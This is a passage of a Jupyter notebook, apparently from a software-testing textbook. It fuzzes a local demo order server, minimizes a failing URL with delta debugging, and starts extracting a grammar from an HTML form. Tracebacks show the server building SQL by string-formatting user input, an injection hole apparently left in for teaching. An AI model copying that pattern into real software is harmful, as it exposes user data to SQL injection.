   "outputs": [],
   "source": [
    "while True:\n",
    "    path = mutate_order_fuzzer.fuzz()\n",
    "    url = urljoin(httpd_url, path)\n",
    "    r = requests.get(url)\n",
    "    if r.status_code == HTTPStatus.INTERNAL_SERVER_ERROR:\n",
    "        break"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "That didn't take long.  Here's the offending URL:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 91,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.131536Z",
     "iopub.status.busy": "2025-01-16T10:12:26.131443Z",
     "iopub.status.idle": "2025-01-16T10:12:26.133227Z",
     "shell.execute_reply": "2025-01-16T10:12:26.133004Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "data": {
      "text/plain": [
       "'http://127.0.0.1:8800/order?item=drill&nae=Jane+Doe&email=j.doe%40example.com&city=Seattle&zip=45732'"
      ]
     },
     "execution_count": 91,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "url"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 92,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.134563Z",
     "iopub.status.busy": "2025-01-16T10:12:26.134477Z",
     "iopub.status.idle": "2025-01-16T10:12:26.139621Z",
     "shell.execute_reply": "2025-01-16T10:12:26.139414Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">127.0.0.1 - - [16/Jan/2025 11:12:26] \"GET /order?item=drill&nae=Jane+Doe&email=j.doe%40example.com&city=Seattle&zip=45732 HTTP/1.1\" 500 -\n",
       "</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">127.0.0.1 - - [16/Jan/2025 11:12:26] Traceback (most recent call last):\n",
       "  File \"/var/folders/n2/xd9445p97rb3xh7m1dfx8_4h0006ts/T/ipykernel_53958/3183845167.py\", line 8, in do_GET\n",
       "    self.handle_order()\n",
       "  File \"/var/folders/n2/xd9445p97rb3xh7m1dfx8_4h0006ts/T/ipykernel_53958/1342827050.py\", line 4, in handle_order\n",
       "    self.store_order(values)\n",
       "  File \"/var/folders/n2/xd9445p97rb3xh7m1dfx8_4h0006ts/T/ipykernel_53958/1382513861.py\", line 5, in store_order\n",
       "    sql_command = \"INSERT INTO orders VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')\".format(**values)\n",
       "                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n",
       "KeyError: 'name'\n",
       "</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "\n",
       "<html><body>\n",
       "<div style=\"border:3px; border-style:solid; border-color:#FF0000; padding: 1em;\">\n",
       "  <strong id=\"title\" style=\"font-size: x-large\">Internal Server Error</strong>\n",
       "  <p>\n",
       "  The server has encountered an internal error.  Go to our <a href=\"/\">order form</a>.\n",
       "  <pre>Traceback (most recent call last):\n",
       "  File \"/var/folders/n2/xd9445p97rb3xh7m1dfx8_4h0006ts/T/ipykernel_53958/3183845167.py\", line 8, in do_GET\n",
       "    self.handle_order()\n",
       "  File \"/var/folders/n2/xd9445p97rb3xh7m1dfx8_4h0006ts/T/ipykernel_53958/1342827050.py\", line 4, in handle_order\n",
       "    self.store_order(values)\n",
       "  File \"/var/folders/n2/xd9445p97rb3xh7m1dfx8_4h0006ts/T/ipykernel_53958/1382513861.py\", line 5, in store_order\n",
       "    sql_command = \"INSERT INTO orders VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')\".format(**values)\n",
       "                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n",
       "KeyError: 'name'\n",
       "</pre>\n",
       "  </p>\n",
       "</div>\n",
       "</body></html>\n",
       "  "
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "execution_count": 92,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "clear_httpd_messages()\n",
    "HTML(webbrowser(url))"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "How does the URL cause this internal error?  We make use of [delta debugging](Reducer.ipynb) to minimize the failure-inducing path, setting up a `WebRunner` class to define the failure condition:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 93,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.141044Z",
     "iopub.status.busy": "2025-01-16T10:12:26.140952Z",
     "iopub.status.idle": "2025-01-16T10:12:26.142684Z",
     "shell.execute_reply": "2025-01-16T10:12:26.142460Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "data": {
      "text/plain": [
       "'/order?item=drill&nae=Jane+Doe&email=j.doe%40example.com&city=Seattle&zip=45732'"
      ]
     },
     "execution_count": 93,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "failing_path = path\n",
    "failing_path"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 94,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.144116Z",
     "iopub.status.busy": "2025-01-16T10:12:26.144008Z",
     "iopub.status.idle": "2025-01-16T10:12:26.145524Z",
     "shell.execute_reply": "2025-01-16T10:12:26.145307Z"
    },
    "slideshow": {
     "slide_type": "skip"
    }
   },
   "outputs": [],
   "source": [
    "from Fuzzer import Runner"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 95,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.146877Z",
     "iopub.status.busy": "2025-01-16T10:12:26.146802Z",
     "iopub.status.idle": "2025-01-16T10:12:26.149123Z",
     "shell.execute_reply": "2025-01-16T10:12:26.148915Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [],
   "source": [
    "class WebRunner(Runner):\n",
    "    \"\"\"Runner for a Web server\"\"\"\n",
    "\n",
    "    def __init__(self, base_url: Optional[str] = None):\n",
    "        self.base_url = base_url\n",
    "\n",
    "    def run(self, url: str) -> Tuple[str, str]:\n",
    "        if self.base_url is not None:\n",
    "            url = urljoin(self.base_url, url)\n",
    "\n",
    "        import requests  # for imports\n",
    "        r = requests.get(url)\n",
    "        if r.status_code == HTTPStatus.OK:\n",
    "            return url, Runner.PASS\n",
    "        elif r.status_code == HTTPStatus.INTERNAL_SERVER_ERROR:\n",
    "            return url, Runner.FAIL\n",
    "        else:\n",
    "            return url, Runner.UNRESOLVED"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 96,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.150423Z",
     "iopub.status.busy": "2025-01-16T10:12:26.150353Z",
     "iopub.status.idle": "2025-01-16T10:12:26.154092Z",
     "shell.execute_reply": "2025-01-16T10:12:26.153882Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [
    {
     "data": {
      "text/plain": [
       "('http://127.0.0.1:8800/order?item=drill&nae=Jane+Doe&email=j.doe%40example.com&city=Seattle&zip=45732',\n",
       " 'FAIL')"
      ]
     },
     "execution_count": 96,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "web_runner = WebRunner(httpd_url)\n",
    "web_runner.run(failing_path)"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "This is the minimized path:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 97,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.155554Z",
     "iopub.status.busy": "2025-01-16T10:12:26.155476Z",
     "iopub.status.idle": "2025-01-16T10:12:26.211630Z",
     "shell.execute_reply": "2025-01-16T10:12:26.211382Z"
    },
    "slideshow": {
     "slide_type": "skip"
    }
   },
   "outputs": [],
   "source": [
    "from Reducer import DeltaDebuggingReducer  # minor"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 98,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.213312Z",
     "iopub.status.busy": "2025-01-16T10:12:26.213233Z",
     "iopub.status.idle": "2025-01-16T10:12:26.236868Z",
     "shell.execute_reply": "2025-01-16T10:12:26.236595Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "data": {
      "text/plain": [
       "'order'"
      ]
     },
     "execution_count": 98,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "minimized_path = DeltaDebuggingReducer(web_runner).reduce(failing_path)\n",
    "minimized_path"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "It turns out that our server encounters an internal error if we do not supply the requested fields:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 99,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.238390Z",
     "iopub.status.busy": "2025-01-16T10:12:26.238308Z",
     "iopub.status.idle": "2025-01-16T10:12:26.240365Z",
     "shell.execute_reply": "2025-01-16T10:12:26.240161Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "data": {
      "text/plain": [
       "'http://127.0.0.1:8800/order'"
      ]
     },
     "execution_count": 99,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "minimized_url = urljoin(httpd_url, minimized_path)\n",
    "minimized_url"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 100,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.241838Z",
     "iopub.status.busy": "2025-01-16T10:12:26.241763Z",
     "iopub.status.idle": "2025-01-16T10:12:26.257839Z",
     "shell.execute_reply": "2025-01-16T10:12:26.257516Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">127.0.0.1 - - [16/Jan/2025 11:12:26] \"GET /doe%40example.com&city=Seattle&zip=45732 HTTP/1.1\" 404 -\n",
       "</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">127.0.0.1 - - [16/Jan/2025 11:12:26] \"GET /order?item=drill&nae=Jane+Doe&email=j. HTTP/1.1\" 500 -\n",
       "</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">127.0.0.1 - - [16/Jan/2025 11:12:26] Traceback (most recent call last):\n",
       "  File \"/var/folders/n2/xd9445p97rb3xh7m1dfx8_4h0006ts/T/ipykernel_53958/3183845167.py\", line 8, in do_GET\n",
       "    self.handle_order()\n",
       "  File \"/var/folders/n2/xd9445p97rb3xh7m1dfx8_4h0006ts/T/ipykernel_53958/1342827050.py\", line 4, in handle_order\n",
       "    self.store_order(values)\n",
       "  File \"/var/folders/n2/xd9445p97rb3xh7m1dfx8_4h0006ts/T/ipykernel_53958/1382513861.py\", line 5, in store_order\n",
       "    sql_command = \"INSERT INTO orders VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')\".format(**values)\n",
       "                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n",
       "KeyError: 'name'\n",
       "</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">127.0.0.1 - - [16/Jan/2025 11:12:26] \"GET /ae=Jane+Doe&email=j. HTTP/1.1\" 404 -\n",
       "</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">127.0.0.1 - - [16/Jan/2025 11:12:26] \"GET /order?item=drill&n HTTP/1.1\" 500 -\n",
       "</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">127.0.0.1 - - [16/Jan/2025 11:12:26] Traceback (most recent call last):\n",
       "  File \"/var/folders/n2/xd9445p97rb3xh7m1dfx8_4h0006ts/T/ipykernel_53958/3183845167.py\", line 8, in do_GET\n",
       "    self.handle_order()\n",
       "  File \"/var/folders/n2/xd9445p97rb3xh7m1dfx8_4h0006ts/T/ipykernel_53958/1342827050.py\", line 4, in handle_order\n",
       "    self.store_order(values)\n",
       "  File \"/var/folders/n2/xd9445p97rb3xh7m1dfx8_4h0006ts/T/ipykernel_53958/1382513861.py\", line 5, in store_order\n",
       "    sql_command = \"INSERT INTO orders VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')\".format(**values)\n",
       "                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n",
       "KeyError: 'name'\n",
       "</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">127.0.0.1 - - [16/Jan/2025 11:12:26] \"GET /em=drill&n HTTP/1.1\" 404 -\n",
       "</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">127.0.0.1 - - [16/Jan/2025 11:12:26] \"GET /order?it HTTP/1.1\" 500 -\n",
       "</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">127.0.0.1 - - [16/Jan/2025 11:12:26] Traceback (most recent call last):\n",
       "  File \"/var/folders/n2/xd9445p97rb3xh7m1dfx8_4h0006ts/T/ipykernel_53958/3183845167.py\", line 8, in do_GET\n",
       "    self.handle_order()\n",
       "  File \"/var/folders/n2/xd9445p97rb3xh7m1dfx8_4h0006ts/T/ipykernel_53958/1342827050.py\", line 4, in handle_order\n",
       "    self.store_order(values)\n",
       "  File \"/var/folders/n2/xd9445p97rb3xh7m1dfx8_4h0006ts/T/ipykernel_53958/1382513861.py\", line 5, in store_order\n",
       "    sql_command = \"INSERT INTO orders VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')\".format(**values)\n",
       "                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n",
       "KeyError: 'item'\n",
       "</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">127.0.0.1 - - [16/Jan/2025 11:12:26] \"GET /er?it HTTP/1.1\" 404 -\n",
       "</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">127.0.0.1 - - [16/Jan/2025 11:12:26] \"GET /ord HTTP/1.1\" 404 -\n",
       "</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">127.0.0.1 - - [16/Jan/2025 11:12:26] \"GET /rder?it HTTP/1.1\" 404 -\n",
       "</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">127.0.0.1 - - [16/Jan/2025 11:12:26] \"GET /oer?it HTTP/1.1\" 404 -\n",
       "</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">127.0.0.1 - - [16/Jan/2025 11:12:26] \"GET /ord?it HTTP/1.1\" 404 -\n",
       "</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">127.0.0.1 - - [16/Jan/2025 11:12:26] \"GET /order HTTP/1.1\" 500 -\n",
       "</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">127.0.0.1 - - [16/Jan/2025 11:12:26] Traceback (most recent call last):\n",
       "  File \"/var/folders/n2/xd9445p97rb3xh7m1dfx8_4h0006ts/T/ipykernel_53958/3183845167.py\", line 8, in do_GET\n",
       "    self.handle_order()\n",
       "  File \"/var/folders/n2/xd9445p97rb3xh7m1dfx8_4h0006ts/T/ipykernel_53958/1342827050.py\", line 4, in handle_order\n",
       "    self.store_order(values)\n",
       "  File \"/var/folders/n2/xd9445p97rb3xh7m1dfx8_4h0006ts/T/ipykernel_53958/1382513861.py\", line 5, in store_order\n",
       "    sql_command = \"INSERT INTO orders VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')\".format(**values)\n",
       "                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n",
       "KeyError: 'item'\n",
       "</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">127.0.0.1 - - [16/Jan/2025 11:12:26] \"GET /rder HTTP/1.1\" 404 -\n",
       "</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">127.0.0.1 - - [16/Jan/2025 11:12:26] \"GET /oer HTTP/1.1\" 404 -\n",
       "</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">127.0.0.1 - - [16/Jan/2025 11:12:26] \"GET /order HTTP/1.1\" 500 -\n",
       "</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">127.0.0.1 - - [16/Jan/2025 11:12:26] Traceback (most recent call last):\n",
       "  File \"/var/folders/n2/xd9445p97rb3xh7m1dfx8_4h0006ts/T/ipykernel_53958/3183845167.py\", line 8, in do_GET\n",
       "    self.handle_order()\n",
       "  File \"/var/folders/n2/xd9445p97rb3xh7m1dfx8_4h0006ts/T/ipykernel_53958/1342827050.py\", line 4, in handle_order\n",
       "    self.store_order(values)\n",
       "  File \"/var/folders/n2/xd9445p97rb3xh7m1dfx8_4h0006ts/T/ipykernel_53958/1382513861.py\", line 5, in store_order\n",
       "    sql_command = \"INSERT INTO orders VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')\".format(**values)\n",
       "                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n",
       "KeyError: 'item'\n",
       "</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">127.0.0.1 - - [16/Jan/2025 11:12:26] \"GET /oder HTTP/1.1\" 404 -\n",
       "</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">127.0.0.1 - - [16/Jan/2025 11:12:26] \"GET /orer HTTP/1.1\" 404 -\n",
       "</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">127.0.0.1 - - [16/Jan/2025 11:12:26] \"GET /ordr HTTP/1.1\" 404 -\n",
       "</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">127.0.0.1 - - [16/Jan/2025 11:12:26] \"GET /orde HTTP/1.1\" 404 -\n",
       "</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">127.0.0.1 - - [16/Jan/2025 11:12:26] \"GET /order HTTP/1.1\" 500 -\n",
       "</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">127.0.0.1 - - [16/Jan/2025 11:12:26] Traceback (most recent call last):\n",
       "  File \"/var/folders/n2/xd9445p97rb3xh7m1dfx8_4h0006ts/T/ipykernel_53958/3183845167.py\", line 8, in do_GET\n",
       "    self.handle_order()\n",
       "  File \"/var/folders/n2/xd9445p97rb3xh7m1dfx8_4h0006ts/T/ipykernel_53958/1342827050.py\", line 4, in handle_order\n",
       "    self.store_order(values)\n",
       "  File \"/var/folders/n2/xd9445p97rb3xh7m1dfx8_4h0006ts/T/ipykernel_53958/1382513861.py\", line 5, in store_order\n",
       "    sql_command = \"INSERT INTO orders VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')\".format(**values)\n",
       "                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n",
       "KeyError: 'item'\n",
       "</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "\n",
       "<html><body>\n",
       "<div style=\"border:3px; border-style:solid; border-color:#FF0000; padding: 1em;\">\n",
       "  <strong id=\"title\" style=\"font-size: x-large\">Internal Server Error</strong>\n",
       "  <p>\n",
       "  The server has encountered an internal error.  Go to our <a href=\"/\">order form</a>.\n",
       "  <pre>Traceback (most recent call last):\n",
       "  File \"/var/folders/n2/xd9445p97rb3xh7m1dfx8_4h0006ts/T/ipykernel_53958/3183845167.py\", line 8, in do_GET\n",
       "    self.handle_order()\n",
       "  File \"/var/folders/n2/xd9445p97rb3xh7m1dfx8_4h0006ts/T/ipykernel_53958/1342827050.py\", line 4, in handle_order\n",
       "    self.store_order(values)\n",
       "  File \"/var/folders/n2/xd9445p97rb3xh7m1dfx8_4h0006ts/T/ipykernel_53958/1382513861.py\", line 5, in store_order\n",
       "    sql_command = \"INSERT INTO orders VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')\".format(**values)\n",
       "                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n",
       "KeyError: 'item'\n",
       "</pre>\n",
       "  </p>\n",
       "</div>\n",
       "</body></html>\n",
       "  "
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "execution_count": 100,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "clear_httpd_messages()\n",
    "HTML(webbrowser(minimized_url))"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "We see that we might have a lot to do to make our Web server more robust against unexpected inputs.  The [exercises](#Exercises) give some instructions on what to do."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "slide"
    }
   },
   "source": [
    "## Extracting Grammars for Input Forms\n",
    "\n",
    "In our previous examples, we have assumed that we have a grammar that produces valid (or less valid) order queries.  However, such a grammar does not need to be specified manually; we can also _extract it automatically_ from a Web page at hand.  This way, we can apply our test generators on arbitrary Web forms without a manual specification step."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "### Searching HTML for Input Fields\n",
    "\n",
    "The key idea of our approach is to identify all input fields in a form.  To this end, let us take a look at how the individual elements in our order form are encoded in HTML:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 101,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.260363Z",
     "iopub.status.busy": "2025-01-16T10:12:26.260280Z",
     "iopub.status.idle": "2025-01-16T10:12:26.264565Z",
     "shell.execute_reply": "2025-01-16T10:12:26.264336Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">127.0.0.1 - - [16/Jan/2025 11:12:26] \"GET / HTTP/1.1\" 200 -\n",
       "</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "<form action=\"/order\" style=\"border:3px; border-style:solid; border-color:#FF0000; padding: 1em;\">\n",
      "  <strong id=\"title\" style=\"font-size: x-large\">Fuzzingbook Swag Order Form</strong>\n",
      "  <p>\n",
      "  Yes! Please send me at your earliest convenience\n",
      "  <select name=\"item\">\n",
      "  <option value=\"tshirt\">One FuzzingBook T-Shirt</option>\n",
      "<option value=\"drill\">One FuzzingBook Rotary Hammer</option>\n",
      "<option value=\"lockset\">One FuzzingBook Lock Set</option>\n",
      "\n",
      "  </select>\n",
      "  <br>\n",
      "  <table>\n",
      "  <tr><td>\n",
      "  <label for=\"name\">Name: </label><input type=\"text\" name=\"name\">\n",
      "  </td><td>\n",
      "  <label for=\"email\">Email: </label><input type=\"email\" name=\"email\"><br>\n",
      "  </td></tr>\n",
      "  <tr><td>\n",
      "  <label for=\"city\">City: </label><input type=\"text\" name=\"city\">\n",
      "  </td><td>\n",
      "  <label for=\"zip\">ZIP Code: </label><input type=\"number\" name=\"zip\">\n",
      "  </tr></tr>\n",
      "  </table>\n",
      "  <input type=\"checkbox\" name=\"terms\"><label for=\"terms\">I have read\n",
      "  the <a href=\"/terms\">terms and conditions</a></label>.<br>\n",
      "  <input type=\"submit\" name=\"submit\" value=\"Place order\">\n",
      "</p>\n",
      "</form>\n"
     ]
    }
   ],
   "source": [
    "html_text = webbrowser(httpd_url)\n",
    "print(html_text[html_text.find(\"<form\"):html_text.find(\"</form>\") + len(\"</form>\")])"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "We see that there is a number of form elements that accept inputs, in particular `<input>`, but also `<select>` and `<option>`.  The idea now is to _parse_ the HTML of the Web page in question, to extract these individual input elements, and then to create a _grammar_ that produces a matching URL, effectively filling out the form."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "To parse the HTML page, we could define a grammar to parse HTML and make use of [our own parser infrastructure](Parser.ipynb).  However, it is much easier to not reinvent the wheel and instead build on the existing, dedicated `HTMLParser` class from the Python library."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 102,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.266274Z",
     "iopub.status.busy": "2025-01-16T10:12:26.266182Z",
     "iopub.status.idle": "2025-01-16T10:12:26.268206Z",
     "shell.execute_reply": "2025-01-16T10:12:26.267970Z"
    },
    "slideshow": {
     "slide_type": "skip"
    }
   },
   "outputs": [],
   "source": [
    "from html.parser import HTMLParser"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
